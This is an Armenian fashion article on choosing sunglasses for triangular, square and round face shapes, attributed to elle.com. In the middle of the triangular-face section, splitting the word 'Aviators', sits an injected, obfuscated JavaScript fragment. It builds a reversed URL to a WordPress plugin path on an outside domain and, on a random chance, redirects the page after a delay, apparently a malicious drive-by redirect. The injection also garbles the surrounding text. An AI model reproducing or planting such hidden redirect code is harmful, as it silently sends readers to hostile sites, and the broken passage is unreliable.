Լավագույն արևային ակնոցները ձեր դեմքի ձևի համար

Անկախ նրանից, թե ինչ ոճի արևային ակնոցներ եք նախընտրում, միշտ կլինեն ակնոցների որոշակի տեսակներ, որոնք կներկայացնեն ձեր դեմքը լավագույն կերպով: Ստորև կարող եք պարզել, թե ինչպիսի ակնոցներն են կատարյալ ձեր դեմքի համար:

 

Եռանկյունաձև դեմքերի համար

Եռանկյունաձև դեմքերը կարիք ունեն ակնոցի այնպիսի շրջանակների, որոնց շնորհիվ նրանց նուրբ ծնոտը ավելի լայն տեսք կունենա: Եթե դուք ունեք հաստ ունքեր և նեղ կզակ, ինչպես, օրինակ՝ Mindy Kaling-ը, փորձեք ակնոցներ, որոնց շրջանակների ներքևի մասը լայն է: Aviatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors ոճի ակնոցները նույնպես հիանալի տարբերակ են նման դեմքի համար:

Քառակուսաձև դեմքերի համար

Չեզոք գույները կօգնեն նրբացնել դեմքը և հստակորեն ցույց տալ դեմքի կառուցվածքը: Կլոր եզրեր ունեցող օվալաձև ակնոցները կամ ուղղանկյունաձև ակնոցները շատ հարմար կլինեն այս դեպքում: Ժամանակակից կատվի աչքերի տեսքով ակնոցները ևս հիանալի կնայվեն այսպիսի դեմքին:

Կլոր դեմքերի համար

Ուղղանկյունաձև արևային ակնոցները կհավասարակշռեն ձեր կլորավուն դեմքի առանձնահատկությունները: Մեկ այլ տարբերակ են դասական կատվի աչքի տեսքով ակնոցները: Փորձեք զերծ մնալ չափազանց մեծ շրջանակներով ակնոցներից:

Աղբյուր՝ elle.com